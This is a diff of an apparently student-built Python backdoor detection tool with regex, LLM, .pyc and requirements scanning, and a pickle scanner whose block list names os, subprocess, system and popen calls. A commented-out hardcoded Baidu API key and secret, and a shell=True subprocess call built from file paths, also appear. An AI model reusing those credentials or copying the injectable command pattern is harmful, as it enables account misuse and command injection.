return text_output
|
||||
|
||||
|
||||
def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr: str):
|
||||
# TODO:添加更多方式,这里提高代码的复用性和扩展性
|
||||
if fileExtension == ".pyc":
|
||||
# 反汇编pyc文件
|
||||
file_content = disassemble_pyc(filePath, pycdc_addr)
|
||||
if file_content == "none":
|
||||
global PYCDC_FLAG
|
||||
PYCDC_FLAG = False
|
||||
return ""
|
||||
elif file_content == "invalid":
|
||||
global PYCDC_ADDR_FLAG
|
||||
PYCDC_ADDR_FLAG = False
|
||||
if mode == "regex":
|
||||
return find_dangerous_functions(file_content, fileExtension)
|
||||
elif mode == "llm":
|
||||
return detectGPT(file_content)
|
||||
else:
|
||||
return find_dangerous_functions(file_content, fileExtension)
|
||||
else:
|
||||
file_content = read_file_content(filePath)
|
||||
if mode == "regex":
|
||||
return find_dangerous_functions(file_content, fileExtension)
|
||||
elif mode == "llm":
|
||||
return detectGPT(file_content)
|
||||
else:
|
||||
return find_dangerous_functions(file_content, fileExtension)
|
||||
|
||||
|
||||
def process_path(
|
||||
path: str,
|
||||
output_format: str,
|
||||
mode: str,
|
||||
pycdc_addr: str,
|
||||
output_file=None,
|
||||
requirement_path=None,
|
||||
):
|
||||
results = {"high": [], "medium": [], "low": [], "none": [], "pickles": []}
|
||||
if os.path.isdir(path):
|
||||
# 使用rglob获取所有文件
|
||||
all_files = [
|
||||
file_path
|
||||
for file_path in Path(path).rglob("*")
|
||||
if file_path.suffix in SUPPORTED_EXTENSIONS
|
||||
]
|
||||
print(all_files)
|
||||
if mode == "llm":
|
||||
results = GPTdetectFileList(all_files)
|
||||
else:
|
||||
# 扫描动画
|
||||
for file_path in tqdm(all_files, desc="Scanning files", unit="file"):
|
||||
file_extension = file_path.suffix
|
||||
# print(file_extension)
|
||||
if file_extension in [".pkl",".pickle"]:
|
||||
# print("识别到pickle")
|
||||
res = pickleDataDetection(str(file_path), output_file)
|
||||
results["pickles"].append({"file": str(file_path), "result": res})
|
||||
continue
|
||||
file_results = checkModeAndDetect(
|
||||
mode, str(file_path), file_extension, pycdc_addr
|
||||
)
|
||||
if file_results is not None:
|
||||
for key in file_results:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{file_path}: Line {line_num}", line)
|
||||
for line_num, line in file_results[key]
|
||||
]
|
||||
)
|
||||
elif os.path.isfile(path):
|
||||
file_extension = os.path.splitext(path)[1]
|
||||
if file_extension in [".pkl", ".pickle"]:
|
||||
res = pickleDataDetection(str(path), output_file)
|
||||
results["pickles"].append({"file": str(path), "result": res})
|
||||
elif file_extension in SUPPORTED_EXTENSIONS:
|
||||
file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr)
|
||||
if file_results is not None:
|
||||
for key in file_results:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{path}: Line {line_num}", line)
|
||||
for line_num, line in file_results[key]
|
||||
]
|
||||
)
|
||||
else:
|
||||
print("Unsupported file type.")
|
||||
return
|
||||
else:
|
||||
print("Invalid path.")
|
||||
sys.exit(1)
|
||||
if requirement_path is not None:
|
||||
requirement_detection(requirement_path, output_file)
|
||||
output_results(results, output_format, output_file)
|
||||
|
||||
|
||||
def main():
|
||||
import argparse
|
||||
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Backdoor detection tool.", prog="detection"
|
||||
)
|
||||
parser.add_argument("path", help="Path to the code to analyze")
|
||||
parser.add_argument("-o", "--output", help="Output file path", default=None)
|
||||
parser.add_argument(
|
||||
"-m", "--mode", help="Mode of operation:[regex,llm]", default="regex"
|
||||
)
|
||||
parser.add_argument(
|
||||
"-p",
|
||||
"--pycdc",
|
||||
help="Path to pycdc.exe to decompile",
|
||||
default=os.getenv("PATH"),
|
||||
)
|
||||
parser.add_argument(
|
||||
"-P",
|
||||
"--Pickle",
|
||||
help="Path to pickle file to analyze",
|
||||
default=None,
|
||||
)
|
||||
parser.add_argument(
|
||||
"-r",
|
||||
"--requirement",
|
||||
help="Path to requirement file to analyze",
|
||||
default=None,
|
||||
)
|
||||
args = parser.parse_args()
|
||||
output_format = "txt" # Default output format
|
||||
output_file = None
|
||||
if args.output:
|
||||
_, ext = os.path.splitext(args.output)
|
||||
ext = ext.lower()
|
||||
if ext in [".html", ".md", ".txt", ".pdf"]:
|
||||
output_format = ext.replace(".", "")
|
||||
output_file = args.output
|
||||
else:
|
||||
print(
|
||||
"Your input file format was incorrect, the output has been saved as a TXT file."
|
||||
)
|
||||
output_file = args.output.rsplit(".", 1)[0] + ".txt"
|
||||
# 如果未指定输出文件,则输出到 stdout;否则写入文件
|
||||
process_path(
|
||||
args.path, output_format, args.mode, args.pycdc, output_file, args.requirement
|
||||
)
|
||||
if PYCDC_FLAG == False:
|
||||
print(
|
||||
"ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc."
|
||||
)
|
||||
print("Repo: https://github.com/zrax/pycdc.git")
|
||||
if PYCDC_ADDR_FLAG == False:
|
||||
print("ERROR: The specified pycdc.exe path is not valid")
|
||||
print("Please check your pycdc path.")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
204
detection/backdoor_detection.py
Normal file
204
detection/backdoor_detection.py
Normal file
@@ -0,0 +1,204 @@
|
||||
import os
|
||||
from typing import Dict, List, Tuple
|
||||
from reportlab.lib.pagesizes import letter
|
||||
from reportlab.lib.styles import getSampleStyleSheet
|
||||
from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate
|
||||
|
||||
from detection.pickle_detection import pickleDataDetection
|
||||
from .Regexdetection import find_dangerous_functions
|
||||
from .GPTdetection import detectGPT
|
||||
from .utils import *
|
||||
import sys
|
||||
|
||||
SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp"}
|
||||
OUTPUT_FORMATS = ["html", "md", "txt", "pdf"]
|
||||
|
||||
|
||||
def generate_text_content(results):
|
||||
text_output = "Security Analysis Report\n"
|
||||
for risk_level, entries in results.items():
|
||||
if entries and risk_level != "none":
|
||||
text_output += f"{risk_level.capitalize()} Risk:\n"
|
||||
for line_num, line in entries:
|
||||
text_output += f" Line {line_num}: {line}\n"
|
||||
return text_output
|
||||
|
||||
|
||||
def output_results(results, output_format, output_file=None):
|
||||
if output_file:
|
||||
file_name = os.path.splitext(output_file)
|
||||
if output_format not in OUTPUT_FORMATS:
|
||||
output_format = "txt"
|
||||
output_file = f"{file_name}.txt"
|
||||
results_dir = os.path.dirname(output_file)
|
||||
if not os.path.exists(results_dir):
|
||||
os.makedirs(results_dir)
|
||||
if output_format == "pdf":
|
||||
output_pdf(results, output_file)
|
||||
elif output_format == "html":
|
||||
output_html(results, output_file)
|
||||
elif output_format == "md":
|
||||
output_markdown(results, output_file)
|
||||
else: # Default to txt
|
||||
output_text(results, output_file)
|
||||
else:
|
||||
# If no output file is specified, default to text output to the terminal.
|
||||
txt_output = generate_text_content(results)
|
||||
print(txt_output)
|
||||
|
||||
|
||||
def output_pdf(results: Dict[str, List[Tuple[int, str]]], file_name):
|
||||
doc = SimpleDocTemplate(file_name, pagesize=letter)
|
||||
story = []
|
||||
styles = getSampleStyleSheet()
|
||||
|
||||
# Add the title centered
|
||||
title_style = styles["Title"]
|
||||
title_style.alignment = 1 # Center alignment
|
||||
title = Paragraph("Security Analysis Report", title_style)
|
||||
story.append(title)
|
||||
story.append(Spacer(1, 20)) # Space after title
|
||||
|
||||
# Add risk levels and entries
|
||||
normal_style = styles["BodyText"]
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
story.append(
|
||||
Paragraph(f"{risk_level.capitalize()} Risk:", styles["Heading2"])
|
||||
)
|
||||
for line_num, line in entries:
|
||||
entry = Paragraph(f"Line {line_num}: {line}", normal_style)
|
||||
story.append(entry)
|
||||
story.append(Spacer(1, 12)) # Space between sections
|
||||
|
||||
doc.build(story)
|
||||
|
||||
|
||||
def output_html(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
html_output = "<html><head><title>Security Analysis Report</title></head><body>"
|
||||
html_output += "<h1>Security Analysis Report</h1>"
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
html_output += f"<h2>{risk_level.capitalize()} Risk</h2><ul>"
|
||||
for line_num, line in entries:
|
||||
html_output += f"<li>{line_num}: {line}</li>"
|
||||
html_output += "</ul>"
|
||||
html_output += "</body></html>"
|
||||
if file_name:
|
||||
with open(file_name, "w") as file:
|
||||
file.write(html_output)
|
||||
else:
|
||||
return html_output
|
||||
|
||||
|
||||
def output_markdown(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
md_output = "# Security Analysis Report\n"
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
md_output += f"## {risk_level.capitalize()} Risk\n"
|
||||
for line_num, line in entries:
|
||||
md_output += f"- {line_num}: {line}\n"
|
||||
if file_name:
|
||||
with open(file_name, "w") as file:
|
||||
file.write(md_output)
|
||||
else:
|
||||
return md_output
|
||||
|
||||
|
||||
def output_text(results: Dict[str, List[Tuple[int, str]]], file_name=None):
|
||||
text_output = "Security Analysis Report\n"
|
||||
for risk_level, entries in results.items():
|
||||
if risk_level != "none":
|
||||
text_output += f"{risk_level.capitalize()} Risk:\n"
|
||||
for line_num, line in entries:
|
||||
text_output += f" {line_num}: {line}\n"
|
||||
if file_name:
|
||||
with open(file_name, "w") as file:
|
||||
file.write(text_output)
|
||||
else:
|
||||
return text_output
|
||||
|
||||
|
||||
def checkModeAndDetect(mode: str, filePath: str, fileExtension: str):
|
||||
# TODO:添加更多方式,这里提高代码的复用性和扩展性
|
||||
if mode == "regex":
|
||||
return find_dangerous_functions(read_file_content(filePath), fileExtension)
|
||||
elif mode == "llm":
|
||||
return detectGPT(read_file_content(filePath))
|
||||
else:
|
||||
return find_dangerous_functions(read_file_content(filePath), fileExtension)
|
||||
|
||||
|
||||
def process_path(path: str, output_format: str, mode: str, output_file=None):
|
||||
results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
if os.path.isdir(path):
|
||||
for root, dirs, files in os.walk(path):
|
||||
for file in files:
|
||||
file_extension = os.path.splitext(file)[1]
|
||||
if file_extension in SUPPORTED_EXTENSIONS:
|
||||
file_path = os.path.join(root, file)
|
||||
|
||||
file_results = checkModeAndDetect(mode, file_path, file_extension)
|
||||
for key in file_results:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{file_path}: Line {line_num}", line)
|
||||
for line_num, line in file_results[key]
|
||||
]
|
||||
)
|
||||
elif os.path.isfile(path):
|
||||
file_extension = os.path.splitext(path)[1]
|
||||
if file_extension in SUPPORTED_EXTENSIONS:
|
||||
file_results = checkModeAndDetect(mode, path, file_extension)
|
||||
for key in file_results:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{path}: Line {line_num}", line)
|
||||
for line_num, line in file_results[key]
|
||||
]
|
||||
)
|
||||
else:
|
||||
print("Unsupported file type.")
|
||||
return
|
||||
else:
|
||||
print("Invalid path.")
|
||||
sys.exit(1)
|
||||
|
||||
output_results(results, output_format, output_file)
|
||||
|
||||
|
||||
def main():
|
||||
import argparse
|
||||
|
||||
parser = argparse.ArgumentParser(description="Backdoor detection tool.")
|
||||
parser.add_argument("path", help="Path to the code to analyze")
|
||||
parser.add_argument("-o", "--output", help="Output file path", default=None)
|
||||
parser.add_argument(
|
||||
"-m", "--mode", help="Mode of operation:[regex,llm]", default="regex"
|
||||
)
|
||||
parser.add_argument("-p", "--pickle", help="analyze the pickle file", default=None)
|
||||
args = parser.parse_args()
|
||||
output_format = "txt" # Default output format
|
||||
output_file = None
|
||||
if args.output:
|
||||
_, ext = os.path.splitext(args.output)
|
||||
ext = ext.lower()
|
||||
if ext in [".html", ".md", ".txt", ".pdf"]:
|
||||
output_format = ext.replace(".", "")
|
||||
output_file = args.output
|
||||
else:
|
||||
print(
|
||||
"Your input file format was incorrect, the output has been saved as a TXT file."
|
||||
)
|
||||
output_file = args.output.rsplit(".", 1)[0] + ".txt"
|
||||
# 如果未指定输出文件,则输出到 stdout;否则写入文件
|
||||
if args.pickle:
|
||||
pickleDataDetection(args.pickle, output_file)
|
||||
else:
|
||||
process_path(args.path, output_format, args.mode, output_file)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
149
detection/cngptdetection.py
Normal file
149
detection/cngptdetection.py
Normal file
@@ -0,0 +1,149 @@
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
|
||||
import requests
|
||||
import re
|
||||
import json
|
||||
from typing import List, Dict, Any
|
||||
|
||||
from detection.utils import read_file_content
|
||||
|
||||
|
||||
class TimeoutException(Exception):
|
||||
"""自定义异常用于处理超时情况。"""
|
||||
pass
|
||||
|
||||
|
||||
def detectGPT(content: str,token:str):
|
||||
"""
|
||||
检测给定的代码内容中的潜在安全漏洞。
|
||||
|
||||
参数:
|
||||
- content: 要检测的代码字符串。
|
||||
|
||||
返回:
|
||||
- 分类后的漏洞信息的JSON字符串。
|
||||
"""
|
||||
|
||||
url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + token
|
||||
|
||||
payload = json.dumps({
|
||||
"messages": [
|
||||
{
|
||||
"role": "user",
|
||||
"content": (
|
||||
"You are a Python code reviewer. Read the code below and identify any potential "
|
||||
"security vulnerabilities. Classify them by risk level (high, medium, low, none). "
|
||||
'Only report the line number and the risk level.\nYou should output the result as '
|
||||
'json format in one line. For example: [{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnerable}"}] '
|
||||
"Each of these three fields is required.\nYou are required to only output the json format. "
|
||||
"Do not output any other information." + content
|
||||
)
|
||||
}
|
||||
]
|
||||
})
|
||||
headers = {
|
||||
'Content-Type': 'application/json'
|
||||
}
|
||||
|
||||
try:
|
||||
response = requests.post(url, headers=headers, data=payload)
|
||||
response.raise_for_status()
|
||||
res_json = response.json()
|
||||
message_content = res_json.get('result')
|
||||
if message_content is None:
|
||||
raise ValueError("API response content is None")
|
||||
except requests.RequestException as e:
|
||||
raise ValueError(f"Request failed: {str(e)}")
|
||||
|
||||
extracted_data = extract_json_from_text(message_content)
|
||||
|
||||
classified_results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
for res in extracted_data:
|
||||
# print(res)
|
||||
try:
|
||||
line_number = int(res["Line"])
|
||||
classified_results[res["Risk"]].append(
|
||||
(line_number, content.split("\n")[line_number - 1].strip())
|
||||
)
|
||||
except (ValueError, IndexError, KeyError):
|
||||
continue
|
||||
|
||||
return classified_results
|
||||
|
||||
|
||||
def get_access_token(api_key: str, secret_key: str) -> str:
|
||||
"""
|
||||
使用API密钥和秘密生成访问令牌。
|
||||
|
||||
返回:
|
||||
- access_token字符串。
|
||||
"""
|
||||
url = "https://aip.baidubce.com/oauth/2.0/token"
|
||||
params = {"grant_type": "client_credentials", "client_id": api_key, "client_secret": secret_key}
|
||||
response = requests.post(url, params=params)
|
||||
response.raise_for_status()
|
||||
return response.json().get("access_token")
|
||||
|
||||
|
||||
def extract_json_from_text(text: str) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
从文本中提取JSON数据。
|
||||
|
||||
参数:
|
||||
- text: 包含JSON数据的字符串文本。
|
||||
|
||||
返回:
|
||||
- 包含提取JSON数据的字典列表。
|
||||
"""
|
||||
json_match = re.search(r'\[\s*{.*?}\s*\]', text, re.DOTALL)
|
||||
if not json_match:
|
||||
print("未找到 JSON 数据")
|
||||
return []
|
||||
|
||||
json_string = json_match.group(0)
|
||||
try:
|
||||
data = json.loads(json_string)
|
||||
except json.JSONDecodeError as e:
|
||||
print(f"解码 JSON 时出错: {e}")
|
||||
return []
|
||||
|
||||
return data
|
||||
|
||||
|
||||
def GPTdetectFileList(fileList):
|
||||
api_key = os.getenv("BAIDU_API_KEY")
|
||||
secret_key = os.getenv("BAIDU_SECRET_KEY")
|
||||
# api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa"
|
||||
# secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7"
|
||||
if not api_key or not secret_key:
|
||||
raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
|
||||
# print(len(fileList))
|
||||
results = {"high": [], "medium": [], "low": [], "none": []}
|
||||
threads = []
|
||||
token = get_access_token(api_key, secret_key)
|
||||
# print(token)
|
||||
for file in fileList:
|
||||
content = read_file_content(str(file))
|
||||
threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results,token)))
|
||||
for thread in threads:
|
||||
thread.start()
|
||||
time.sleep(0.5)
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
return results
|
||||
|
||||
|
||||
def GPTThread(filename, content, results,token):
|
||||
|
||||
res = detectGPT(content,token)
|
||||
# print(res)
|
||||
for key in res:
|
||||
if key != "none": # Exclude 'none' risk level
|
||||
results[key].extend(
|
||||
[
|
||||
(f"{filename}: Line {line_num}", line)
|
||||
for line_num, line in res[key]
|
||||
]
|
||||
)
|
||||
149
detection/pickle_detection.py
Normal file
149
detection/pickle_detection.py
Normal file
@@ -0,0 +1,149 @@
|
||||
import io
|
||||
import json
|
||||
import pickle
|
||||
|
||||
|
||||
class _Unframer:
|
||||
|
||||
def __init__(self, file_read, file_readline, file_tell=None):
|
||||
self.file_read = file_read
|
||||
self.file_readline = file_readline
|
||||
self.current_frame = None
|
||||
|
||||
def readinto(self, buf):
|
||||
if self.current_frame:
|
||||
n = self.current_frame.readinto(buf)
|
||||
if n == 0 and len(buf) != 0:
|
||||
self.current_frame = None
|
||||
n = len(buf)
|
||||
buf[:] = self.file_read(n)
|
||||
return n
|
||||
if n < len(buf):
|
||||
raise pickle.UnpicklingError("pickle exhausted before end of frame")
|
||||
return n
|
||||
else:
|
||||
n = len(buf)
|
||||
buf[:] = self.file_read(n)
|
||||
return n
|
||||
|
||||
def read(self, n):
|
||||
if self.current_frame:
|
||||
data = self.current_frame.read(n)
|
||||
if not data and n != 0:
|
||||
self.current_frame = None
|
||||
return self.file_read(n)
|
||||
if len(data) < n:
|
||||
raise pickle.UnpicklingError("pickle exhausted before end of frame")
|
||||
return data
|
||||
else:
|
||||
return self.file_read(n)
|
||||
|
||||
def readline(self):
|
||||
if self.current_frame:
|
||||
data = self.current_frame.readline()
|
||||
if not data:
|
||||
self.current_frame = None
|
||||
return self.file_readline()
|
||||
if data[-1] != b"\n"[0]:
|
||||
raise pickle.UnpicklingError("pickle exhausted before end of frame")
|
||||
return data
|
||||
else:
|
||||
return self.file_readline()
|
||||
|
||||
def load_frame(self, frame_size):
|
||||
if self.current_frame and self.current_frame.read() != b"":
|
||||
raise pickle.UnpicklingError(
|
||||
"beginning of a new frame before end of current frame"
|
||||
)
|
||||
self.current_frame = io.BytesIO(self.file_read(frame_size))
|
||||
|
||||
|
||||
dangerous_modules = ["os", "subprocess", "builtins", "nt"]
|
||||
dangerous_names = [
|
||||
"system",
|
||||
"popen",
|
||||
"run",
|
||||
"call",
|
||||
"check_output",
|
||||
"check_call",
|
||||
]
|
||||
|
||||
|
||||
class pickleScanner:
|
||||
|
||||
def __init__(
|
||||
self, file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None
|
||||
):
|
||||
self._buffers = iter(buffers) if buffers is not None else None
|
||||
self._file_readline = file.readline
|
||||
self._file_read = file.read
|
||||
self.memo = {}
|
||||
self.encoding = encoding
|
||||
self.errors = errors
|
||||
self.proto = 0
|
||||
self.fix_imports = fix_imports
|
||||
self.file = file
|
||||
self.ReduceCount = 0
|
||||
self.maliciousModule = []
|
||||
|
||||
def find_class(self, module, name):
|
||||
if module.decode() in dangerous_modules or name.decode() in dangerous_names:
|
||||
# self.maliciousCount += 1
|
||||
self.maliciousModule.append((module.decode(), name.decode()))
|
||||
|
||||
def load(self):
|
||||
self._unframer = _Unframer(self._file_read, self._file_readline)
|
||||
self.read = self._unframer.read
|
||||
self.readinto = self._unframer.readinto
|
||||
self.readline = self._unframer.readline
|
||||
self.seek = self.file.seek
|
||||
self.metastack = []
|
||||
self.stack = []
|
||||
self.append = self.stack.append
|
||||
self.proto = 0
|
||||
# 扫描所有的opcodes
|
||||
opcode = self.read(1)
|
||||
while opcode:
|
||||
if opcode == b"c":
|
||||
self.seek(-2, 1)
|
||||
codeN1 = self.read(1)
|
||||
if (
|
||||
65 <= ord(codeN1) <= 90
|
||||
or 97 <= ord(codeN1) <= 122
|
||||
or ord(codeN1) == 0
|
||||
):
|
||||
self.read(1)
|
||||
else:
|
||||
self.read(1)
|
||||
module = self.readline()[:-1]
|
||||
name = self.readline()[:-1]
|
||||
self.find_class(module, name)
|
||||
elif opcode in self.unsafe_opcodes:
|
||||
self.ReduceCount += 1
|
||||
opcode = self.read(1)
|
||||
|
||||
unsafe_opcodes = {
|
||||
b"r", # REDUCE - call a callable with arguments
|
||||
b"R", # REDUCE - same as 'r', but for args tuple
|
||||
}
|
||||
|
||||
def output(self) -> dict:
|
||||
return {
|
||||
"ReduceCount": self.ReduceCount,
|
||||
"maliciousModule": self.maliciousModule,
|
||||
}
|
||||
|
||||
|
||||
def pickleDataDetection(filename: str, output_file=None):
|
||||
"""
|
||||
:param file: pickle file path
|
||||
"""
|
||||
with open(filename, "rb") as file:
|
||||
pickscan = pickleScanner(file)
|
||||
pickscan.load()
|
||||
res = pickscan.output()
|
||||
return res
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
pickleDataDetection("test.pkl")
|
||||
44
detection/pyc_detection.py
Normal file
44
detection/pyc_detection.py
Normal file
@@ -0,0 +1,44 @@
|
||||
from typing import List, Tuple
|
||||
import io
|
||||
import os
|
||||
import subprocess
|
||||
from contextlib import redirect_stdout, redirect_stderr
|
||||
|
||||
|
||||
def run_pycdc(exe_path: str, pyc_file: str) -> str:
|
||||
"""
|
||||
Executes pycdc.exe with the given .pyc file using a command line string and captures the output.
|
||||
|
||||
Args:
|
||||
exe_path (str): Path to the pycdc.exe executable.
|
||||
pyc_file (str): Path to the .pyc file to decompile.
|
||||
|
||||
Returns:
|
||||
str: Output from pycdc.exe.
|
||||
"""
|
||||
if not os.path.isfile(exe_path):
|
||||
return "invalid"
|
||||
|
||||
command = f'"{exe_path}" "{pyc_file}"'
|
||||
result = subprocess.run(
|
||||
command, capture_output=True, text=True, shell=True, encoding="utf-8"
|
||||
)
|
||||
|
||||
return result.stdout
|
||||
|
||||
|
||||
def disassemble_pyc(file_path: str, pycdc_addr=None) -> str:
|
||||
"""
|
||||
Disassembles a .pyc file using uncompyle6.
|
||||
|
||||
Args:
|
||||
file_path (str): The path to the .pyc file.
|
||||
|
||||
Returns:
|
||||
str: The disassembled code as a string.
|
||||
"""
|
||||
output = io.StringIO()
|
||||
if pycdc_addr is None:
|
||||
return "none"
|
||||
else:
|
||||
return run_pycdc(pycdc_addr, file_path)
|
||||
268
detection/requirements_detection.py
Normal file
268
detection/requirements_detection.py
Normal file
@@ -0,0 +1,268 @@
|
||||
import argparse
|
||||
import requests
|
||||
from bs4 import BeautifulSoup
|
||||
from packaging.version import Version, InvalidVersion
|
||||
import sys
|
||||
from reportlab.lib.pagesizes import letter
|
||||
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
|
||||
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
|
||||
from colorama import Fore, Style, init
|
||||
from tqdm import tqdm
|
||||
import html
|
||||
import os
|
||||
|
||||
|
||||
init(autoreset=True) # 初始化colorama,并在每次打印后自动重置颜色
|
||||
|
||||
|
||||
def fetch_html(url: str) -> str:
|
||||
try:
|
||||
response = requests.get(url)
|
||||
response.raise_for_status()
|
||||
return response.text
|
||||
except requests.RequestException as e:
|
||||
print(f"Error fetching {url}: {e}")
|
||||
return ""
|
||||
|
||||
|
||||
def parse_html(html: str) -> list:
|
||||
soup = BeautifulSoup(html, "html.parser")
|
||||
table = soup.find("table", id="sortable-table")
|
||||
if not table:
|
||||
return []
|
||||
|
||||
rows = table.find_all("tr", class_="vue--table__row")
|
||||
results = []
|
||||
for row in rows:
|
||||
info = {}
|
||||
link = row.find("a")
|
||||
chip = row.find("span", class_="vue--chip__value")
|
||||
if link and chip:
|
||||
info["link"] = link.get_text(strip=True)
|
||||
info["chip"] = chip.get_text(strip=True)
|
||||
results.append(info)
|
||||
return results
|
||||
|
||||
|
||||
def load_requirements(file_path: str) -> list:
|
||||
requirements = []
|
||||
try:
|
||||
with open(file_path, "r") as file:
|
||||
for line in file:
|
||||
line = line.strip()
|
||||
if line and not line.startswith("#"):
|
||||
requirements.append(line)
|
||||
except FileNotFoundError:
|
||||
print(f"Error: File {file_path} not found.")
|
||||
sys.exit(1)
|
||||
return requirements
|
||||
|
||||
|
||||
def version_in_range(version, range_str: str) -> bool:
|
||||
if version is not None:
|
||||
try:
|
||||
v = Version(version)
|
||||
except InvalidVersion:
|
||||
return False
|
||||
else:
|
||||
if range_str[-2] == ",":
|
||||
return True
|
||||
|
||||
ranges = range_str.split(",")
|
||||
for range_part in ranges:
|
||||
range_part = range_part.strip("[]()")
|
||||
if range_part:
|
||||
try:
|
||||
if range_part.endswith(")"):
|
||||
upper = Version(range_part[:-1])
|
||||
if v >= upper:
|
||||
return False
|
||||
elif range_part.startswith("["):
|
||||
lower = Version(range_part[1:])
|
||||
if v < lower:
|
||||
return False
|
||||
except InvalidVersion:
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
def check_vulnerabilities(requirements: list, base_url: str) -> str:
|
||||
results = []
|
||||
for req in tqdm(requirements, desc="Checking vulnerabilities", unit="dependency"):
|
||||
version = ""
|
||||
if "==" in req:
|
||||
package_name, version = req.split("==")
|
||||
else:
|
||||
package_name, version = req, None
|
||||
url = f"{base_url}{package_name}"
|
||||
# print(f"\nFetching data for {package_name} from {url}")
|
||||
html_content = fetch_html(url)
|
||||
if html_content:
|
||||
extracted_data = parse_html(html_content)
|
||||
if extracted_data:
|
||||
relevant_vulns = []
|
||||
for vuln in extracted_data:
|
||||
if version_in_range(version, vuln["chip"]):
|
||||
relevant_vulns.append(vuln)
|
||||
if relevant_vulns:
|
||||
result = f"Vulnerabilities found for {package_name}:\n"
|
||||
for vuln in relevant_vulns:
|
||||
result += f" - {vuln['link']}\n"
|
||||
results.append(result)
|
||||
return "\n".join(results)
|
||||
|
||||
|
||||
def save_to_file(output_path: str, data: str):
|
||||
if output_path.endswith(".html"):
|
||||
save_as_html(output_path, data)
|
||||
elif output_path.endswith(".pdf"):
|
||||
save_as_pdf(output_path, data)
|
||||
elif output_path.endswith(".md"):
|
||||
save_as_markdown(output_path, data)
|
||||
else:
|
||||
save_as_txt(output_path, data)
|
||||
|
||||
|
||||
def save_as_html(output_path: str, data: str):
|
||||
escaped_data = html.escape(data)
|
||||
html_content = f"""
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png">
|
||||
<title>Vulnerability Report</title>
|
||||
<style>
|
||||
body {{
|
||||
font-family: Arial, sans-serif;
|
||||
background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg');
|
||||
background-size: cover;
|
||||
color: #333;
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
display: flex;
|
||||
justify-content: center;
|
||||
align-items: center;
|
||||
height: 100vh;
|
||||
}}
|
||||
.container {{
|
||||
background: rgba(255, 255, 255, 0.8);
|
||||
border-radius: 10px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
|
||||
max-width: 800px;
|
||||
width: 100%;
|
||||
margin: 20px;
|
||||
overflow-y: auto;
|
||||
max-height: 90vh;
|
||||
}}
|
||||
.title {{
|
||||
font-size: 24px;
|
||||
font-weight: bold;
|
||||
text-align: center;
|
||||
margin-bottom: 20px;
|
||||
}}
|
||||
pre {{
|
||||
white-space: pre-wrap;
|
||||
word-wrap: break-word;
|
||||
font-size: 14px;
|
||||
line-height: 1.5;
|
||||
color: #333;
|
||||
background: #f4f4f4;
|
||||
padding: 10px;
|
||||
border-radius: 5px;
|
||||
border: 1px solid #ddd;
|
||||
overflow: auto;
|
||||
font-weight: bold;
|
||||
}}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<div class="title">Vulnerability Report</div>
|
||||
<pre>{escaped_data}</pre>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
with open(output_path, "w", encoding="utf-8") as file:
|
||||
file.write(html_content)
|
||||
|
||||
|
||||
def save_as_pdf(output_path: str, data: str):
|
||||
doc = SimpleDocTemplate(output_path, pagesize=letter)
|
||||
story = []
|
||||
styles = getSampleStyleSheet()
|
||||
|
||||
# Add the title centered
|
||||
title_style = ParagraphStyle(
|
||||
"Title",
|
||||
parent=styles["Title"],
|
||||
alignment=1, # Center alignment
|
||||
fontSize=24,
|
||||
leading=28,
|
||||
spaceAfter=20,
|
||||
fontName="Helvetica-Bold",
|
||||
)
|
||||
title = Paragraph("Vulnerability Report", title_style)
|
||||
story.append(title)
|
||||
|
||||
# Normal body text style
|
||||
normal_style = ParagraphStyle(
|
||||
"BodyText", parent=styles["BodyText"], fontSize=12, leading=15, spaceAfter=12
|
||||
)
|
||||
|
||||
# Add the vulnerability details
|
||||
for line in data.split("\n"):
|
||||
if line.strip(): # Skip empty lines
|
||||
story.append(Paragraph(line, normal_style))
|
||||
|
||||
doc.build(story)
|
||||
|
||||
|
||||
